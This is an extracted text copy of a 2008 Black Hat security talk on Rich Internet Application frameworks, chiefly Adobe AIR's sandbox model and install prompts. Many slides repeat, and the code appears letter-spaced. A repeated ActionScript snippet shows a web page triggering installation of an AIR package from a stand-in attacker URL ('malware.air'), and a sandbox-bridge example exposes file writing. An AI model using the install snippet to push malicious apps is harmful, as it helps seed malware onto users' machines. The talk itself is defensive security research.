7/29/2019 Ria World Bh 2008

1/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OSRIA vs the web

RIA vs RIA

Living in the RIA World:

Blurring the Line between Web and Desktop Security

Alex StamosDavid Thiel

Justine Osborne

iSEC Partners

August 6, 2008

http://find/http://goback/

7/29/2019 Ria World Bh 2008

2/199

7/29/2019 Ria World Bh 2008

3/199

7/29/2019 Ria World Bh 2008

4/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OSRIA vs the web

RIA vs RIA

Whats a RIA?Rich Internet Applications

As with Web 2.0, ill-defined

May contain some of the following ingredients:

AJAXy Flashiness

Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices

Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design

http://find/

7/29/2019 Ria World Bh 2008

5/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OSRIA vs the web

RIA vs RIA

Whats a RIA?Rich Internet Applications

As with Web 2.0, ill-defined

May contain some of the following ingredients:

AJAXy Flashiness

Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices

Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design

http://find/

7/29/2019 Ria World Bh 2008

6/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OSRIA vs the web

RIA vs RIA

Whats a RIA?Rich Internet Applications

As with Web 2.0, ill-defined

May contain some of the following ingredients:

AJAXy Flashiness

Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices

Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design

http://find/

7/29/2019 Ria World Bh 2008

7/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OSRIA vs the web

RIA vs RIA

Whats a RIA?Rich Internet Applications

As with Web 2.0, ill-defined

May contain some of the following ingredients:

AJAXy Flashiness

Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices

Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design

http://find/http://goback/

7/29/2019 Ria World Bh 2008

8/199

7/29/2019 Ria World Bh 2008

9/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Whats a RIA?Rich Internet Applications

As with Web 2.0, ill-defined

May contain some of the following ingredients:

AJAXy Flashiness

Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices

Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design

http://find/

7/29/2019 Ria World Bh 2008

10/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Whats a RIA?Rich Internet Applications

As with Web 2.0, ill-defined

May contain some of the following ingredients:

AJAXy Flashiness

Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices

Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design

http://find/http://goback/

7/29/2019 Ria World Bh 2008

11/199

7/29/2019 Ria World Bh 2008

12/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Why use a RIA?

Web 2.0 no longer gets you VC funding

To increase responsiveness distribute data stores

between server and clientDesktop integration take advantage of OS UIfunctionality

Never learned any real programming languages

In short, web developers can now write full desktopapps. This could be good or bad.

http://find/http://goback/

7/29/2019 Ria World Bh 2008

13/199

7/29/2019 Ria World Bh 2008

14/199

7/29/2019 Ria World Bh 2008

15/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Why use a RIA?

Web 2.0 no longer gets you VC funding

To increase responsiveness distribute data stores

between server and clientDesktop integration take advantage of OS UIfunctionality

Never learned any real programming languages

In short, web developers can now write full desktopapps. This could be good or bad.

http://find/http://goback/

7/29/2019 Ria World Bh 2008

16/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Why use a RIA?

Web 2.0 no longer gets you VC funding

To increase responsiveness distribute data stores

between server and clientDesktop integration take advantage of OS UIfunctionality

Never learned any real programming languages

In short, web developers can now write full desktopapps. This could be good or bad.

http://find/http://goback/

7/29/2019 Ria World Bh 2008

17/199

RIA F k

7/29/2019 Ria World Bh 2008

18/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

RIA FrameworksFight!

Ad b AIR

http://find/http://goback/

7/29/2019 Ria World Bh 2008

19/199

Living in the

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Adobe AIRQuick Summary

Runs disconnected Standalone app Privileged OS access Can launch itself

Local data storage Has an installer Raw network sockets Cross-domain XHR

Dedicated session management

Can talk to the calling DOM IPC mechanisms Proper SSL security

http://find/http://goback/

7/29/2019 Ria World Bh 2008

20/199

7/29/2019 Ria World Bh 2008

21/199

7/29/2019 Ria World Bh 2008

22/199

7/29/2019 Ria World Bh 2008

23/199

Adobe AIR

7/29/2019 Ria World Bh 2008

24/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIRWhat is Adobe AIR?

So its just like a Win32 program in the eyes of a securityanalyst?

Um, not reallyPower of AIR is the I in RIA

Can be invoked by browser with arguments, like ActiveX orFlashHas many native mechanisms for loading external content

Highly likely that developers will utilize Internet content.Thats the point.

Adobe AIR

http://find/

7/29/2019 Ria World Bh 2008

25/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIRWhat is Adobe AIR?

AIR is best thought of as an ActiveX or Full Trust .Netanalogue and not like Flash++

Code runs with full privileges, can install malwareNative mechanisms allow for interaction with untrustedworld

Fortunately, Adobe has seemed to learn some lessons fromActiveX

Adobe AIR

http://find/

7/29/2019 Ria World Bh 2008

26/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIRAdobe AIR Instantiation

AIR Applications are identified by an appID and pubIDpubID calculated from developer personal information andcertificate

SWF files can import functionality that allows them tointeract with AIR applications. From Adobe:

airSWFLoader . l o a d ( new URLRequest ( " h t t p : / / a i r d o w n l o a d . a d o b e . c o m /b r o w s e r a p i / a i r . s w f " ) , l o a d e r C o n t e x t ) ;

With airSWF classes, the SWF can check on theapplications install status and version

airSWF . g e t A p p l i c a t i o n V e r s i o n ( appID , pubID , v e r s i o n D e t e c t C a l l b a c k ) ;

Now that we know the version, we can instantiate

airSWF . l a u n c h A p p l i c a t i o n ( appID , pubID , a r g u m e n t s ) ;

Adobe AIR

http://find/http://goback/

7/29/2019 Ria World Bh 2008

27/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIRAdobe AIR Instantiation

AIR Applications are identified by an appID and pubIDpubID calculated from developer personal information andcertificate

SWF files can import functionality that allows them tointeract with AIR applications. From Adobe:

airSWFLoader . l o a d ( new URLRequest ( " h t t p : / / a i r d o w n l o a d . a d o b e . c o m /b r o w s e r a p i / a i r . s w f " ) , l o a d e r C o n t e x t ) ;

With airSWF classes, the SWF can check on theapplications install status and version

airSWF . g e t A p p l i c a t i o n V e r s i o n ( appID , pubID , v e r s i o n D e t e c t C a l l b a c k ) ;

Now that we know the version, we can instantiate

airSWF . l a u n c h A p p l i c a t i o n ( appID , pubID , a r g u m e n t s ) ;

http://find/

7/29/2019 Ria World Bh 2008

28/199

Adobe AIR

7/29/2019 Ria World Bh 2008

29/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIRAdobe AIR Instantiation

AIR Applications are identified by an appID and pubIDpubID calculated from developer personal information andcertificate

SWF files can import functionality that allows them tointeract with AIR applications. From Adobe:

airSWFLoader . l o a d ( new URLRequest ( " h t t p : / / a i r d o w n l o a d . a d o b e . c o m /b r o w s e r a p i / a i r . s w f " ) , l o a d e r C o n t e x t ) ;

With airSWF classes, the SWF can check on theapplications install status and version

airSWF . g e t A p p l i c a t i o n V e r s i o n ( appID , pubID , v e r s i o n D e t e c t C a l l b a c k ) ;

Now that we know the version, we can instantiate

airSWF . l a u n c h A p p l i c a t i o n ( appID , pubID , a r g u m e n t s ) ;

Adobe AIR

http://find/

7/29/2019 Ria World Bh 2008

30/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIRAdobe AIR Security Model

By default, code included in AIR application has full rights

New functionality in privileged APIs added to JavaScriptand ActionScriptSome restrictions on interacting with desktop in AIR 1.0Existing capabilities can be chained to run native codeRumors of additional native code capabilities in futurereleases

Adobe AIR

http://find/

7/29/2019 Ria World Bh 2008

31/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

dobeAdobe AIR Security Model

No code access security model as understood on othersystems, such as Java or .Net

Instead, five pre-defined sandboxes with fixed capabilitiesApplication Full perms. Default for code included withAIR appRemote Code downloaded from internet. Browser-likepermissions

Three intermediate permissions for local SWFs

Adobe AIR

http://find/

7/29/2019 Ria World Bh 2008

32/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

No code access security model as understood on othersystems, such as Java or .Net

Instead, five pre-defined sandboxes with fixed capabilitiesApplication Full perms. Default for code included withAIR appRemote Code downloaded from internet. Browser-likepermissions

Three intermediate permissions for local SWFs

http://find/

7/29/2019 Ria World Bh 2008

33/199

Adobe AIR

7/29/2019 Ria World Bh 2008

34/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIRMS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

No code access security model as understood on othersystems, such as Java or .Net

Instead, five pre-defined sandboxes with fixed capabilitiesApplication Full perms. Default for code included withAIR appRemote Code downloaded from internet. Browser-likepermissions

Three intermediate permissions for local SWFs

http://find/http://goback/

7/29/2019 Ria World Bh 2008

35/199

Adobe AIR

7/29/2019 Ria World Bh 2008

36/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

AIR has many ways of loading executable content to run,such as HTML/JS and SWFs

Also many ways of getting external untrusted data

Network trafficArguments from browser invocationCommand line arguments

Application Sandbox

Is not supposed to be able to dynamically generate code

eval() is best example in JSGoal is to eliminate XSS and injection attacks that haveplagued Flash apps that have more kick with localprivileges

Adobe AIR

http://find/http://goback/

7/29/2019 Ria World Bh 2008

37/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

AIR has many ways of loading executable content to run,such as HTML/JS and SWFs

Also many ways of getting external untrusted data

Network trafficArguments from browser invocationCommand line arguments

Application Sandbox

Is not supposed to be able to dynamically generate codeeval() is best example in JSGoal is to eliminate XSS and injection attacks that haveplagued Flash apps that have more kick with localprivileges

http://find/http://goback/

7/29/2019 Ria World Bh 2008

38/199

7/29/2019 Ria World Bh 2008

39/199

7/29/2019 Ria World Bh 2008

40/199

Adobe AIRAdobe AIR Sec it Model

7/29/2019 Ria World Bh 2008

41/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

Seems like a reasonable security precaution. How will webdevelopers circumvent it?

They can look for mistakes in Adobes classification of

methodsBetter yet, use a Sandbox Bridge

Official method of moving data between sandboxesAn application can attach functions or variables to anobject available from multiple sandboxesDocumented as passing by value, not reference, althoughthis doesnt jive with how functions work

Adobe AIRAdobe AIR Security Model

http://find/

7/29/2019 Ria World Bh 2008

42/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

Seems like a reasonable security precaution. How will webdevelopers circumvent it?

They can look for mistakes in Adobes classification of

methodsBetter yet, use a Sandbox Bridge

Official method of moving data between sandboxesAn application can attach functions or variables to anobject available from multiple sandboxesDocumented as passing by value, not reference, althoughthis doesnt jive with how functions work

Adobe AIRAdobe AIR Security Model

http://find/

7/29/2019 Ria World Bh 2008

43/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

Seems like a reasonable security precaution. How will webdevelopers circumvent it?

They can look for mistakes in Adobes classification of

methodsBetter yet, use a Sandbox Bridge

Official method of moving data between sandboxesAn application can attach functions or variables to anobject available from multiple sandboxes

Documented as passing by value, not reference, althoughthis doesnt jive with how functions work

Adobe AIRAdobe AIR Security Model

http://find/http://goback/

7/29/2019 Ria World Bh 2008

44/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

First parent sets up Sandbox Bridge

v a r h i g h R i g h t s S t u f f = {};h i g h R i g h t s S t u f f . w r i t e T o F i l e = f u n c t i o n ( name , c o n t e n t ){

// W r it e t o f i l e w i th a i r . F i l e St r e a m}

document . g e t E l e m e n t B y I d ( " c h i l d " ) . contentWindow . p a r e n t S a n d b o x B r i d g e =h i g h R i g h t s S t u f f ;

Then child code (in a IFRAME) can access the function

window . p a r e n t S a n d b o x B r i d g e . w r i t e T o F i l e ( name , c o n t e n t ) ;

Adobe AIRAdobe AIR Security Model

http://find/http://goback/

7/29/2019 Ria World Bh 2008

45/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Adobe AIR Security Model

First parent sets up Sandbox Bridge

v a r h i g h R i g h t s S t u f f = {};h i g h R i g h t s S t u f f . w r i t e T o F i l e = f u n c t i o n ( name , c o n t e n t ){

// W r it e t o f i l e w i th a i r . F i l e St r e a m}

document . g e t E l e m e n t B y I d ( " c h i l d " ) . contentWindow . p a r e n t S a n d b o x B r i d g e =h i g h R i g h t s S t u f f ;

Then child code (in a IFRAME) can access the function

window . p a r e n t S a n d b o x B r i d g e . w r i t e T o F i l e ( name , c o n t e n t ) ;

Adobe AIRInstalling AIR

http://find/

7/29/2019 Ria World Bh 2008

46/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

Installing AIR

AIR requires Flash 9

Can be installed via external binary or inside of Flash:

Adobe AIRInstalling an AIR Application

http://find/http://goback/

7/29/2019 Ria World Bh 2008

47/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

sta g a pp cat o

AIR applications can be bundled as binaries (*.air)

Can also be installed by a web page from inside a SWF

v a r u r l : S t r i n g = " h t t p : / / w w w . c y b e r v i l l a i n s . c o m / m a l w a r e . a i r " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1 . 0 " ;v a r a r g u m e n t s : A r r a y = [ " l a u n c h F r o m B r o w s e r " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ;

Creates an Open/Save prompt

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

48/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

g pp

AIR applications can be bundled as binaries (*.air)

Can also be installed by a web page from inside a SWF

v a r u r l : S t r i n g = " h t t p : / / w w w . c y b e r v i l l a i n s . c o m / m a l w a r e . a i r " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1 . 0 " ;v a r a r g u m e n t s : A r r a y = [ " l a u n c h F r o m B r o w s e r " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ;

Creates an Open/Save prompt

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

49/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the webRIA vs RIA

g pp

AIR applications can be bundled as binaries (*.air)

Can also be installed by a web page from inside a SWF

v a r u r l : S t r i n g = " h t t p : / / w w w . c y b e r v i l l a i n s . c o m / m a l w a r e . a i r " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1 . 0 " ;v a r a r g u m e n t s : A r r a y = [ " l a u n c h F r o m B r o w s e r " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ;

Creates an Open/Save prompt

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

50/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

AIR applications can be bundled as binaries (*.air)

Can also be installed by a web page from inside a SWF

v a r u r l : S t r i n g = " h t t p : / / w w w . c y b e r v i l l a i n s . c o m / m a l w a r e . a i r " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1 . 0 " ;v a r a r g u m e n t s : A r r a y = [ " l a u n c h F r o m B r o w s e r " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ;

Creates an Open/Save prompt

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

51/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Adobe supports signing AIR applications with commercialcertificates

Gives you this prompt:

Notice the default selection

Adobe AIRInstalling an AIR Application

http://find/http://goback/

7/29/2019 Ria World Bh 2008

52/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Adobe supports signing AIR applications with commercialcertificates

Gives you this prompt:

Notice the default selection

Adobe AIRInstalling an AIR Application

http://find/http://goback/

7/29/2019 Ria World Bh 2008

53/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Unfortunately, they also support self-signed certificates

Gives you this prompt:

Adobe AIRInstalling an AIR Application

http://find/http://goback/

7/29/2019 Ria World Bh 2008

54/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation

True, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifying

The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier

malware seeding mechanismAdobe Flash is more popular than IE ever was

Its almost impossible to install ActiveX now. Thats notan accident.

Adobe AIRInstalling an AIR Application

http://find/http://goback/

7/29/2019 Ria World Bh 2008

55/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation

True, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifying

The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier

malware seeding mechanismAdobe Flash is more popular than IE ever was

Its almost impossible to install ActiveX now. Thats notan accident.

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

56/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation

True, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifying

The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier

malware seeding mechanismAdobe Flash is more popular than IE ever was

Its almost impossible to install ActiveX now. Thats notan accident.

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

57/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation

True, but so did ActiveXAllowing users to install signed applets is dangerous enough

Allowing self-signed (which is same as unsigned) isterrifying

The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier

malware seeding mechanismAdobe Flash is more popular than IE ever was

Its almost impossible to install ActiveX now. Thats notan accident.

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

58/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation

True, but so did ActiveXAllowing users to install signed applets is dangerous enough

Allowing self-signed (which is same as unsigned) isterrifying

The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier

malware seeding mechanismAdobe Flash is more popular than IE ever was

Its almost impossible to install ActiveX now. Thats notan accident.

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

59/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Some suggestions

Change default actionAdd a countdown timer to discourage mindless

clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com

There is perhaps room for something between AIR andFlash without the rootkit abilities

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

60/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Some suggestions

Change default actionAdd a countdown timer to discourage mindless

clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com

There is perhaps room for something between AIR andFlash without the rootkit abilities

Adobe AIRInstalling an AIR Application

http://find/http://goback/

7/29/2019 Ria World Bh 2008

61/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Some suggestions

Change default actionAdd a countdown timer to discourage mindless

clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com

There is perhaps room for something between AIR andFlash without the rootkit abilities

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

62/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Some suggestions

Change default actionAdd a countdown timer to discourage mindless

clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com

There is perhaps room for something between AIR andFlash without the rootkit abilities

Adobe AIRInstalling an AIR Application

http://find/

7/29/2019 Ria World Bh 2008

63/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Some suggestions

Change default actionAdd a countdown timer to discourage mindless

clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com

There is perhaps room for something between AIR andFlash without the rootkit abilities

Questions about Silverlight

http://find/http://goback/

7/29/2019 Ria World Bh 2008

64/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

